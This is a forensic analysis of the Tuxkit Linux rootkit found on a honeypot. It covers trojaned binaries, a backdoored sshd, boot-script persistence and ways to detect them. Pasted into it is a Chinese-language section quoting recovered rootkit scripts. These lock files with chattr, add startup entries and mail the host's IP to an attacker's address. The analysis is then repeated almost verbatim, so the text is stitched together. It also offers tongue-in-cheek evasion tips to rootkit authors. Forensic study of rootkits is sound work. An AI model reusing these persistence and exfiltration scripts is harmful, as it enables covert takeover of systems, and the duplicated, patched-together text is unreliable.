The Tuxtendo's Tuxkit Rootkit Analysis
spoonfork / mel@ini2.net
March 2002
--] Introduction
The following is an analysis of the Tuxkit rootkit, written by a Dutch group
called Tuxtendo. This rootkit was found in one of the honeypots that we
set up. The honeypot was a stock installation of Redhat 7.0, with a few
services running. None of the software, such as named, sendmail and the
printer daemon were patched.
There are three versions of the rootkit that are available on
Tuxtendo's website. They are tuxkit.tgz, tuxkit-1.0.tgz, and tuxkit-short.tgz.
Both tuxkit.tgz and tuxkit-1.0.tgz have the same contents, while
tuxkit-short.tgz contains less tools.
I've also tested some of tuxkit's binaries on Redhat 7.1, and they seemed to
work fine.
The following are the contents of each tuxkit. This analysis will focus on
tuxkit-1.0.tgz, the one that was found on our honeypot. The rootkit was
developed by Argv[], possibly modified from and based on the t0rn rootkit. The
timestamp of the rootkit was December 2001. Googling for "tuxkit analysis"
did not produce any hits, so I guess that this rootkit is pretty new.
NOTE: chkrootkit failed to detect tuxkit.
--] Packages
[root@angel tuxkit-1.0]# ls -l ../tuxkit (tuxkit.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-1.0 (tuxkit-1.0.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-short (tuxkit-1.0-short.tgz)
total 1556
-rw------- 1 1001 1001 502884 Dec 5 07:55 bin.tgz
-rw------- 1 1001 1001 406 Dec 5 07:55 cfg.tgz
-rw------- 1 1001 1001 16213 Dec 5 07:55 lib.tgz
-rw------- 1 1001 1001 3684 Dec 5 07:55 README
-rw------- 1 1001 1001 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 1001 1001 577089 Jan 6 01:12 tools.tgz
-rwx------ 1 1001 1001 9489 Jan 6 00:53 tuxkit
--] tuxkit-1.0.tgz
There are six files in the tuxkit which includes a README, an installation
script, and four tarred/zipped files.
The following are the contents of the individual files in the tuxkit.
- bin.tgz - contains precompiled trojan binaries
- cfg.tgz - contains tuxkit's configuration files
- lib.tgz - contains libproc libraries, for process hiding purposes
- sshd.tgz - contains precompiled sshd, complete with sshd_config
- tools.tgz - contains an arsenal of tools (duh!) for the skrip kiddie
who don't know how to get their own tools. The tools are:
[root@angel tools]# ls -la
total 44
drwxr-xr-x 11 root root 4096 Mar 1 13:14 .
drwxr-xr-x 4 root root 4096 Mar 1 13:14 ..
drwx------ 2 root root 4096 Nov 12 20:50 bitchx
drwx------ 2 root root 4096 Dec 12 23:59 dos
drwx------ 2 root root 4096 Nov 12 20:57 mirkforce
drwx------ 2 root root 4096 Nov 12 20:57 nmapv
drwx------ 8 root root 4096 Nov 12 23:05 psybnc
drwx------ 2 root root 4096 Nov 13 01:00 sniffer
drwx------ 2 root root 4096 Nov 12 20:58 ssh
drwx------ 2 root root 4096 Nov 12 23:22 synscan
drwx------ 2 root root 4096 Nov 12 20:58 utils
The names of these tools are self-explanatory. However, they are all
precompiled. utils contains only one utility - wget. This is to
enable the skripkids to easily download other tools (assuming the skripkids
know how to use wget).
- tuxkit - an installation script
- README - the obligatory README file (and greetz, of course)
The tuxkit is almost similar to the t0rn rootkit. The addition of the
precompiled tools such as nmap, synscan and psybnc makes it a more handy
rootkit. It is flawlessly easy to install. Tuxkit is like a pack-n-go
kinda tool. The appendix shows the contents of each packages in tuxkit.
--] Installation
Installation of tuxkit is very straightforward. The README says:
---README snip---
./tuxkit <Password> <SSHD Port> <BNC Port>
Password : This will be the password you need to login onto
the comromised system.
SSD Port : This will be the port on which the SSHD will be
be listening on for incoming connections.
This port will be hidden automatically in netstat.
bncport : this will be the port psyBNC will listen on.
This port will be hidden automatically in netstat.
The setup script does NOT have default settings, this forces you to
provide a password, sshd and bnc ports.
The setup script also contains a variable called EMAIL, you should edit
this
---README snip---
This sets tuxkit apart from t0rn - it does not use default ports.
The default installation directory is /dev/tux. Shell script savvy skripkids
may want to change this to avoid detection.
NOTE: the tuxkit installationn script contains a variable EMAIL which has
the default value of the author. At the end of the installation, the script
will send an email which the subject "Tuxkit1.0". The e-mail contains
information about the host, the SSH backdoor port, the psyBNC port, and
also the password. If you skripkid didn't change the EMAIL (the README
clearly states to change this), you have the risk of your server being
owned by other people.
--] Trojaning process
The trojaning process is straightforward. syslogd is killed first. Then
all the files that came with tuxkit-1.0.tgz are untarred and upzipped.
The installation directory is created. The default installation directory
is /dev/tux, and even though this is kept as the variable RDIR, the tuxkit
install script hardcoded "mkdir /dev/tux", thus changing RDIR, but forgetting
to change the line above will cause your installation to skew a bit (most
skripkids won't bother to do this anyway). In fact, /dev/tux is hardcoded
almost everywhere in the installation script.
The hidden files .addr, .cron, .file, .log and .proc are copied to /dev/tux/
The library files are copied to lib, and /sbin/ldconfig is executed.
This step is followed by copying files to be trojaned to /dev/tux/backup, and
replacing these files with the trojaned version. A script "sz", which is part
of the bin.tgz is run against each trojaned binaries so that the size matches
that of the original binaries. "sz" basically pads the trojan with zeros
(from /dev/zero).
--] Backdooring process
The backdoored SSH is installed in /usr/bin/xsf. The trojaned sshcheck is
installed in /usr/bin/xchk. Both are invoked the following way:
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
/usr/bin/xchk -q 1>/dev/null 2>/dev/null
The /etc/rc.d/rc.sysinit is also edited to include the following lines:
echo "# Running Xsf ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xsf -q 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
echo "# Running Xchk ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xchk 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
If you string xsf, you will be able to get the passwords that the skripkid
used.
--] The tuxkit configuration files
The tuxkit config files follows that of the original Linux rootkit. There are
.addr, .cron, .file, .log and .proc. The filenames are self-explanatory. These
files follow the convention of the original Linux rootkit. In forensic, what
you will be interested in most is the .addr files, because it contains the
IP that netstat is supposed to hide.
--] Detecting tuxkit
Detecting tuxkit is fairly simple.
1. Look for the existence of /dev/tux
2. Run lsof -i +M | grep xsf
Hey, why wasn't lsof trojaned? t0rn has a trojaned lsof
--] Detecting tuxkit - trojans
1. md5sums - if you've keep an md5sum of the virgin state of your
installation, detecting trojans should be a walk in the park. Every
system administrator should use file integrity checker to monitor
critical file change.
2. Look for /usr/bin/xsf and /usr/bin/xchk
3. Look for extra lines in /etc/rc.sysinit
4. cd /etc/ssh; ls -l. The trojaned ls will return nothing, when in
fact your ssh config files are still there.
The following are the size difference between tuxkit and Redhat 7.1 binaries.
(before installation)
files tuxkit Redhat 7.1
------------------------------------------
crontab 29052 21280
df 27112 26812
dir 42952 45948
dmesg 3640 4252
du 25592 25788
find 55220 47516
ifconfig 36356 51164
killall 14400 12096
locate 9144 25020 (symlink to slocate)
login 3980 17740
ls 42952 45948
netstat 58228 83132
ps 62748 63180
pstree 14532 12284
sshcheck 89828 - (my test machine don't have this)
sshdconfig 451260 - (my test machine don't have this)
syslogd 28324 26972
tcpd 18660 24844
top 37844 34924
updatedb 4394 25020 (symlink to slocate)
vdir 42952 45948
This result is quite interesting. Trojans are not supposed to be bigger that
the original binaries!
--] Detecting tuxkit - if you are lucky
On our honeypot, the trojaned 'ps' still shows xsf, even though xsf was in
the list of processes to be hidden. However, 'ls' seems to work very well
in hiding files.
--] Recommendations
For tuxkit developers
- Add trojaned lsof. Borrow one from t0rn Also, fix ps.
- tools.tgz is probably not needed. A skripkid who is able to crack a Linux
machine (duh) should be able to download and compile his/her own tools.
Furthermore, tools.tgz adds unnecessary extra bytes to the tuxkit - not
really convenient for downloading.
- Add a self-deleting script, i.e. delete the tar files and installation
directory after installation. skripkids seems incapable of doing this.
The config files should be kept somewhere else other than /dev/tux.
For skripkidz - vi tuxkit, type the following:
:%s///dev//tux/installation_dir_of_your_choice/g
where installation_dir_of_your_choice is, uh, the installation directory
of your choice. (However, this won't work, since /dev/tux/.{addr,proc}, etc
are already hardcoded to the binaries - so hehe, just run ./tuxkit and pray
that the stupid system administrators won't notice
For system administrators - run file integrity checker after each fresh
install.
--] Conclusion
The world of forensic analysis ain't fun without rootkits.
--] Appendix - Contents of each packages
[root@angel tuxkit-1.0]# less bin.tgz
-rwx------ root/root 29052 2001-12-26 21:37:57 bin/crontab
-rwx------ root/root 27112 2001-12-26 21:37:57 bin/df
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/dir
-rwx------ root/root 3640 2001-12-26 21:37:57 bin/dmesg
-rwx------ root/root 25592 2001-12-26 21:37:57 bin/du
-rwx------ root/root 55220 2001-12-26 21:37:57 bin/find
-rwx------ root/root 36356 2001-12-26 21:37:57 bin/ifconfig
-rwx------ root/root 14400 2001-12-26 21:37:57 bin/killall
-rwx------ root/root 9144 2001-12-26 21:37:57 bin/locate
-rwx------ root/root 3980 2001-12-26 21:37:57 bin/login
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/ls
-rwx------ root/root 58228 2001-12-26 21:37:57 bin/netstat
-rwx------ root/root 62748 2001-12-26 21:37:57 bin/ps
-rwx------ root/root 14532 2001-12-26 21:37:57 bin/pstree
-rwx------ root/root 89828 2001-12-26 21:37:57 bin/sshcheck
-rwx------ root/root 451260 2001-12-26 21:37:57 bin/sshdconfig
-rwx------ root/root 28324 2001-12-26 21:37:57 bin/syslogd
-rwx------ root/root 1522 2001-12-26 21:37:57 bin/sz
-rwx------ root/root 18660 2001-12-26 21:37:57 bin/tcpd
-rwx------ root/root 37844 2001-12-26 21:37:57 bin/top
-rwx------ root/root 4394 2001-12-26 21:37:57 bin/updatedb
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/vdir
[root@angel tuxkit-1.0]# less cfg.tgz
-rw------- root/root 17 2001-11-11 19:12:19 cfg/.addr
-rw------- root/root 69 2001-11-12 23:06:32 cfg/.cron
-rw------- root/root 67 2001-12-27 20:54:23 cfg/.file
-rw------- root/root 13 2001-12-27 20:54:47 cfg/.log
-rw------- root/root 116 2001-12-27 20:55:29 cfg/.proc
[root@angel tuxkit-1.0]# less sshd.tgz
-rw------- virus/virus 828 2001-12-13 00:22:12 ssh2/hostkey
-rw------- virus/virus 697 2001-12-13 00:22:12 ssh2/hostkey.pub
-rw------- virus/virus 503 2001-12-27 20:43:12 ssh2/logo
-rw------- virus/virus 512 2001-12-13 23:51:33 ssh2/random_seed
-rwx------ virus/virus 1040220 2002-01-06 00:05:58 ssh2/sshd
-rw------- virus/virus 647 2001-12-27 22:42:20 ssh2/sshd2_config
[root@angel tuxkit-1.0]# less lib.tgz
lrwxrwxrwx root/root 0 2001-11-11 02:49:02 lib/libproc.so -> libproc.so.
2.0.7
################end###################
tuxkit在我的机器上生成了/dev/tux目录。其中有.addr、 .cron、 .file、 .log、.proc5个隐藏文件有关于tuxkit的配置信息
它在我的机器上生成了/usr/sbin目录。其中有tux、tux2w3c、tuxstat三个文件
它还在/lib下面生成tools、ssh2、bin三个目录,放置它用到的工具
在/lib下生成init、iplook、sk、setup四个文件。大家来看看:
setup的内容:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com" 就是这个家伙吧?!!!!
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "Installing the muie !"
chattr -saui /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
rm -rf /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
cp sk /usr/bin/nfs
cp sk /dev/ntfs
cp init /etc/rc.d/init.d/
chattr +saui /usr/bin/nfs /dev/ntfs /etc/rc.d/init.d/init
/etc/rc.d/init.d/init
chattr -saui /etc/rc.d/rc
chattr -saui /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
echo "# init script" >>/etc/rc.d/rc
echo "# init script" >>/etc/rc.d/rc.local
echo "# init script" >>/etc/rc.d/rc.sysinit
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.local
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.sysinit
chattr +saui /etc/rc.d/rc /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
#echo -e " $MYIP # `hostname -f`" | mail -s skrootkit $EMAIL
echo "Done"
cp iplook /usr/bin
chattr +saui /usr/bin/iplook
iplook
echo "----------------------------------------------"
echo -e "System information"
echo -e " Hostname : `hostname -f`"
echo -e " IP address : $MYIP `hostname -i`"
echo -e " Alt IPs : `/sbin/ifconfig | grep eth | wc -l`"
echo -e " Bogomips : `cat /proc/cpuinfo | grep bogomips | awk '{printf $3}'`"
if [ -f /etc/*release ]; then
echo -e " Distribution : `head -1 /etc/*release`"
fi
echo -e " Uptime : `uptime`"
rm -rf skrootkit.tgz
sk
init
iplook
rm -rf setup
iplook的内容:
#!/bin/bash
#
#########################################################################
# -- Echipa 1337 -- #
# #
# Coder: agressor (Echipa 1337). #
# E-Mail: agressor@1337.ro #
# Acest script va arata ip (de retea si eventual de internet) #
# Scriptul poate fi foarte folositor, #
# mai ales pentru cei care au alocate IP Dinamice. #
# #
#########################################################################
#
/sbin/ifconfig | grep "inet addr" | grep -v "127.0.0.1" | /
awk '{print $2;}' | awk -F':' '{print $2;}'
init的内容:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com"
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
if [ -x /usr/bin/nfs ]
then
chattr +saui /usr/bin/nfs
else
cp /dev/ntfs /usr/bin/nfs
chattr +saui /usr/bin/nfs /dev/ntfs
fi
nfs &
nfs i `/sbin/pidof nfs`
echo -e " $MYIP # `hostname -f`" | mail -s reboot $EMAIL
与前文介绍不同,它没有修改我的/etc/rc.d/rc.sysinit而是直接吧我的/etc/rc.d/rc.local改成了这样子
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
#/usr/bin/init
# Running Xsf ...
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
# Running Xchk ...
/usr/bin/xchk 1>/dev/null 2>/dev/null
但是我没发现xsf和xchk两个文件。
tuxkit在入侵后会生成一个ssh的后门。但是我却没弄清楚它是怎么安装到我的机器上的。是通过wuftp还是openssh的漏洞呢?
我已经把机器从2.4.10升级到了2.4.18。现在似乎没看到可以的进程
pe -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Sep19 ? 00:00:06 init
root 2 1 0 Sep19 ? 00:00:00 [migration_CPU0]
root 3 1 0 Sep19 ? 00:00:00 [migration_CPU1]
root 4 1 0 Sep19 ? 00:00:00 [migration_CPU2]
root 5 1 0 Sep19 ? 00:00:00 [migration_CPU3]
root 6 1 0 Sep19 ? 00:00:00 [keventd]
root 7 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU0]
root 8 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU1]
root 9 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU2]
root 10 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU3]
root 11 1 0 Sep19 ? 00:00:07 [kswapd]
root 12 1 0 Sep19 ? 00:00:09 [bdflush]
root 13 1 0 Sep19 ? 00:00:01 [kupdated]
root 14 1 0 Sep19 ? 00:00:00 [mdrecoveryd]
root 20 1 0 Sep19 ? 00:00:00 [aacraid]
root 21 1 0 Sep19 ? 00:00:00 [scsi_eh_0]
root 26 1 0 Sep19 ? 00:00:01 [kjournald]
root 77 1 0 Sep19 ? 00:00:00 [khubd]
root 151 1 0 Sep19 ? 00:00:00 [kjournald]
root 152 1 0 Sep19 ? 00:00:00 [kjournald]
root 153 1 0 Sep19 ? 00:00:00 [kjournald]
root 154 1 0 Sep19 ? 00:00:02 [kjournald]
root 155 1 0 Sep19 ? 00:00:07 [kjournald]
rpc 643 1 0 Sep19 ? 00:00:00 portmap
rpcuser 662 1 0 Sep19 ? 00:00:00 rpc.statd
root 751 1 0 Sep19 ? 00:00:01 /usr/sbin/sshd
root 785 1 0 Sep19 ? 00:00:00 rpc.rquotad
root 789 1 0 Sep19 ? 00:00:00 [nfsd]
root 790 1 0 Sep19 ? 00:00:00 [nfsd]
root 791 1 0 Sep19 ? 00:00:00 [nfsd]
root 792 1 0 Sep19 ? 00:00:00 [nfsd]
root 793 1 0 Sep19 ? 00:00:00 [nfsd]
root 794 1 0 Sep19 ? 00:00:00 [nfsd]
root 795 1 0 Sep19 ? 00:00:00 [nfsd]
root 796 1 0 Sep19 ? 00:00:00 [nfsd]
root 797 1 0 Sep19 ? 00:00:00 [lockd]
root 798 797 0 Sep19 ? 00:00:00 [rpciod]
root 804 1 0 Sep19 ? 00:00:00 rpc.mountd
root 813 1 0 Sep19 ? 00:00:00 gpm -t ps/2 -m /dev/mouse
bin 823 1 0 Sep19 ? 00:00:00 cannaserver -syslog -u bin
root 832 1 0 Sep19 ? 00:00:00 crond
xfs 891 1 0 Sep19 ? 00:00:00 xfs -droppriv -daemon
daemon 909 1 0 Sep19 ? 00:00:00 /usr/sbin/atd
oracle 983 1 0 Sep19 ? 00:00:20 ora_pmon_rnet
oracle 985 1 0 Sep19 ? 00:00:07 ora_dbw0_rnet
oracle 987 1 0 Sep19 ? 00:00:18 ora_lgwr_rnet
oracle 989 1 0 Sep19 ? 00:00:30 ora_ckpt_rnet
oracle 991 1 0 Sep19 ? 00:00:01 ora_smon_rnet
oracle 993 1 0 Sep19 ? 00:00:00 ora_reco_rnet
oracle 995 1 0 Sep19 ? 00:00:00 ora_arc0_rnet
oracle 1034 1 0 Sep19 ? 00:00:04 /usr/oracle/product/8.17/bin/tns
root 1053 1 0 Sep19 ? 00:00:01 /usr/NetVault6/bin/nvpmgr
root 1054 1053 0 Sep19 ? 00:00:00 nvcmgr 2
root 1058 1 0 Sep19 tty2 00:00:00 /sbin/mingetty tty2
root 1059 1 0 Sep19 tty3 00:00:00 /sbin/mingetty tty3
root 1060 1 0 Sep19 tty4 00:00:00 /sbin/mingetty tty4
root 1061 1 0 Sep19 tty5 00:00:00 /sbin/mingetty tty5
root 1062 1 0 Sep19 tty6 00:00:00 /sbin/mingetty tty6
root 1065 1053 0 Sep19 ? 00:00:03 nvnmgr 3
root 1315 1 0 Sep19 tty1 00:00:00 /sbin/mingetty tty1
root 30764 1 0 Sep22 ? 00:00:00 xinetd -stayalive -reuse -pidfil
root 4993 751 0 12:00 ? 00:00:00 /usr/sbin/sshd
root 4995 4993 0 12:00 pts/0 00:00:00 -bash
root 5145 1 0 12:10 ? 00:00:00 syslogd -m 0
root 5149 1 0 12:10 ? 00:00:00 klogd -x
spoonfork / mel@ini2.net
March 2002
--] Introduction
The following is an analysis of the Tuxkit rootkit, written by a Dutch group
called Tuxtendo. This rootkit was found in one of the honeypots that we
set up. The honeypot was a stock installation of Redhat 7.0, with a few
services running. None of the software, such as named, sendmail and the
printer daemon were patched.
There are three versions of the rootkit that are available on
Tuxtendo's website. They are tuxkit.tgz, tuxkit-1.0.tgz, and tuxkit-short.tgz.
Both tuxkit.tgz and tuxkit-1.0.tgz have the same contents, while
tuxkit-short.tgz contains less tools.
I've also tested some of tuxkit's binaries on Redhat 7.1, and they seemed to
work fine.
The following are the contents of each tuxkit. This analysis will focus on
tuxkit-1.0.tgz, the one that was found on our honeypot. The rootkit was
developed by Argv[], possibly modified from and based on the t0rn rootkit. The
timestamp of the rootkit was December 2001. Googling for "tuxkit analysis"
did not produce any hits, so I guess that this rootkit is pretty new.
NOTE: chkrootkit failed to detect tuxkit.
--] Packages
[root@angel tuxkit-1.0]# ls -l ../tuxkit (tuxkit.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-1.0 (tuxkit-1.0.tgz)
total 2600
-rw------- 1 sfork sfork 502884 Dec 5 07:55 bin.tgz
-rw------- 1 sfork sfork 406 Dec 5 07:55 cfg.tgz
-rw------- 1 sfork sfork 16213 Dec 5 07:55 lib.tgz
-rw------- 1 sfork sfork 3684 Dec 5 07:55 README
-rw------- 1 sfork sfork 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 sfork sfork 1644819 Dec 5 07:55 tools.tgz
-rwx------ 1 sfork sfork 9489 Jan 6 00:53 tuxkit
[root@angel tuxkit-1.0]# ls -l ../tuxkit-short (tuxkit-1.0-short.tgz)
total 1556
-rw------- 1 1001 1001 502884 Dec 5 07:55 bin.tgz
-rw------- 1 1001 1001 406 Dec 5 07:55 cfg.tgz
-rw------- 1 1001 1001 16213 Dec 5 07:55 lib.tgz
-rw------- 1 1001 1001 3684 Dec 5 07:55 README
-rw------- 1 1001 1001 461892 Jan 6 00:06 sshd.tgz
-rw------- 1 1001 1001 577089 Jan 6 01:12 tools.tgz
-rwx------ 1 1001 1001 9489 Jan 6 00:53 tuxkit
--] tuxkit-1.0.tgz
There are six files in the tuxkit which includes a README, an installation
script, and four tarred/zipped files.
The following are the contents of the individual files in the tuxkit.
- bin.tgz - contains precompiled trojan binaries
- cfg.tgz - contains tuxkit's configuration files
- lib.tgz - contains libproc libraries, for process hiding purposes
- sshd.tgz - contains precompiled sshd, complete with sshd_config
- tools.tgz - contains an arsenal of tools (duh!) for the skrip kiddie
who don't know how to get their own tools. The tools are:
[root@angel tools]# ls -la
total 44
drwxr-xr-x 11 root root 4096 Mar 1 13:14 .
drwxr-xr-x 4 root root 4096 Mar 1 13:14 ..
drwx------ 2 root root 4096 Nov 12 20:50 bitchx
drwx------ 2 root root 4096 Dec 12 23:59 dos
drwx------ 2 root root 4096 Nov 12 20:57 mirkforce
drwx------ 2 root root 4096 Nov 12 20:57 nmapv
drwx------ 8 root root 4096 Nov 12 23:05 psybnc
drwx------ 2 root root 4096 Nov 13 01:00 sniffer
drwx------ 2 root root 4096 Nov 12 20:58 ssh
drwx------ 2 root root 4096 Nov 12 23:22 synscan
drwx------ 2 root root 4096 Nov 12 20:58 utils
The names of these tools are self-explanatory. However, they are all
precompiled. utils contains only one utility - wget. This is to
enable the skripkids to easily download other tools (assuming the skripkids
know how to use wget).
- tuxkit - an installation script
- README - the obligatory README file (and greetz, of course)
The tuxkit is almost similar to the t0rn rootkit. The addition of the
precompiled tools such as nmap, synscan and psybnc makes it a more handy
rootkit. It is flawlessly easy to install. Tuxkit is like a pack-n-go
kinda tool. The appendix shows the contents of each packages in tuxkit.
--] Installation
Installation of tuxkit is very straightforward. The README says:
---README snip---
./tuxkit <Password> <SSHD Port> <BNC Port>
Password : This will be the password you need to login onto
the comromised system.
SSD Port : This will be the port on which the SSHD will be
be listening on for incoming connections.
This port will be hidden automatically in netstat.
bncport : this will be the port psyBNC will listen on.
This port will be hidden automatically in netstat.
The setup script does NOT have default settings, this forces you to
provide a password, sshd and bnc ports.
The setup script also contains a variable called EMAIL, you should edit
this
---README snip---
This sets tuxkit apart from t0rn - it does not use default ports.
The default installation directory is /dev/tux. Shell script savvy skripkids
may want to change this to avoid detection.
NOTE: the tuxkit installationn script contains a variable EMAIL which has
the default value of the author. At the end of the installation, the script
will send an email which the subject "Tuxkit1.0". The e-mail contains
information about the host, the SSH backdoor port, the psyBNC port, and
also the password. If you skripkid didn't change the EMAIL (the README
clearly states to change this), you have the risk of your server being
owned by other people.
--] Trojaning process
The trojaning process is straightforward. syslogd is killed first. Then
all the files that came with tuxkit-1.0.tgz are untarred and upzipped.
The installation directory is created. The default installation directory
is /dev/tux, and even though this is kept as the variable RDIR, the tuxkit
install script hardcoded "mkdir /dev/tux", thus changing RDIR, but forgetting
to change the line above will cause your installation to skew a bit (most
skripkids won't bother to do this anyway). In fact, /dev/tux is hardcoded
almost everywhere in the installation script.
The hidden files .addr, .cron, .file, .log and .proc are copied to /dev/tux/
The library files are copied to lib, and /sbin/ldconfig is executed.
This step is followed by copying files to be trojaned to /dev/tux/backup, and
replacing these files with the trojaned version. A script "sz", which is part
of the bin.tgz is run against each trojaned binaries so that the size matches
that of the original binaries. "sz" basically pads the trojan with zeros
(from /dev/zero).
--] Backdooring process
The backdoored SSH is installed in /usr/bin/xsf. The trojaned sshcheck is
installed in /usr/bin/xchk. Both are invoked the following way:
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
/usr/bin/xchk -q 1>/dev/null 2>/dev/null
The /etc/rc.d/rc.sysinit is also edited to include the following lines:
echo "# Running Xsf ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xsf -q 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
echo "# Running Xchk ..." >> /etc/rc.d/rc.sysinit
echo "/usr/bin/xchk 1>/dev/null 2>/dev/null" >> /etc/rc.d/rc.sysinit
If you string xsf, you will be able to get the passwords that the skripkid
used.
--] The tuxkit configuration files
The tuxkit config files follows that of the original Linux rootkit. There are
.addr, .cron, .file, .log and .proc. The filenames are self-explanatory. These
files follow the convention of the original Linux rootkit. In forensic, what
you will be interested in most is the .addr files, because it contains the
IP that netstat is supposed to hide.
--] Detecting tuxkit
Detecting tuxkit is fairly simple.
1. Look for the existence of /dev/tux
2. Run lsof -i +M | grep xsf
Hey, why wasn't lsof trojaned? t0rn has a trojaned lsof
--] Detecting tuxkit - trojans
1. md5sums - if you've keep an md5sum of the virgin state of your
installation, detecting trojans should be a walk in the park. Every
system administrator should use file integrity checker to monitor
critical file change.
2. Look for /usr/bin/xsf and /usr/bin/xchk
3. Look for extra lines in /etc/rc.sysinit
4. cd /etc/ssh; ls -l. The trojaned ls will return nothing, when in
fact your ssh config files are still there.
The following are the size difference between tuxkit and Redhat 7.1 binaries.
(before installation)
files tuxkit Redhat 7.1
------------------------------------------
crontab 29052 21280
df 27112 26812
dir 42952 45948
dmesg 3640 4252
du 25592 25788
find 55220 47516
ifconfig 36356 51164
killall 14400 12096
locate 9144 25020 (symlink to slocate)
login 3980 17740
ls 42952 45948
netstat 58228 83132
ps 62748 63180
pstree 14532 12284
sshcheck 89828 - (my test machine don't have this)
sshdconfig 451260 - (my test machine don't have this)
syslogd 28324 26972
tcpd 18660 24844
top 37844 34924
updatedb 4394 25020 (symlink to slocate)
vdir 42952 45948
This result is quite interesting. Trojans are not supposed to be bigger that
the original binaries!
--] Detecting tuxkit - if you are lucky
On our honeypot, the trojaned 'ps' still shows xsf, even though xsf was in
the list of processes to be hidden. However, 'ls' seems to work very well
in hiding files.
--] Recommendations
For tuxkit developers
- Add trojaned lsof. Borrow one from t0rn Also, fix ps.
- tools.tgz is probably not needed. A skripkid who is able to crack a Linux
machine (duh) should be able to download and compile his/her own tools.
Furthermore, tools.tgz adds unnecessary extra bytes to the tuxkit - not
really convenient for downloading.
- Add a self-deleting script, i.e. delete the tar files and installation
directory after installation. skripkids seems incapable of doing this.
The config files should be kept somewhere else other than /dev/tux.
For skripkidz - vi tuxkit, type the following:
:%s///dev//tux/installation_dir_of_your_choice/g
where installation_dir_of_your_choice is, uh, the installation directory
of your choice. (However, this won't work, since /dev/tux/.{addr,proc}, etc
are already hardcoded to the binaries - so hehe, just run ./tuxkit and pray
that the stupid system administrators won't notice
For system administrators - run file integrity checker after each fresh
install.
--] Conclusion
The world of forensic analysis ain't fun without rootkits.
--] Appendix - Contents of each packages
[root@angel tuxkit-1.0]# less bin.tgz
-rwx------ root/root 29052 2001-12-26 21:37:57 bin/crontab
-rwx------ root/root 27112 2001-12-26 21:37:57 bin/df
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/dir
-rwx------ root/root 3640 2001-12-26 21:37:57 bin/dmesg
-rwx------ root/root 25592 2001-12-26 21:37:57 bin/du
-rwx------ root/root 55220 2001-12-26 21:37:57 bin/find
-rwx------ root/root 36356 2001-12-26 21:37:57 bin/ifconfig
-rwx------ root/root 14400 2001-12-26 21:37:57 bin/killall
-rwx------ root/root 9144 2001-12-26 21:37:57 bin/locate
-rwx------ root/root 3980 2001-12-26 21:37:57 bin/login
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/ls
-rwx------ root/root 58228 2001-12-26 21:37:57 bin/netstat
-rwx------ root/root 62748 2001-12-26 21:37:57 bin/ps
-rwx------ root/root 14532 2001-12-26 21:37:57 bin/pstree
-rwx------ root/root 89828 2001-12-26 21:37:57 bin/sshcheck
-rwx------ root/root 451260 2001-12-26 21:37:57 bin/sshdconfig
-rwx------ root/root 28324 2001-12-26 21:37:57 bin/syslogd
-rwx------ root/root 1522 2001-12-26 21:37:57 bin/sz
-rwx------ root/root 18660 2001-12-26 21:37:57 bin/tcpd
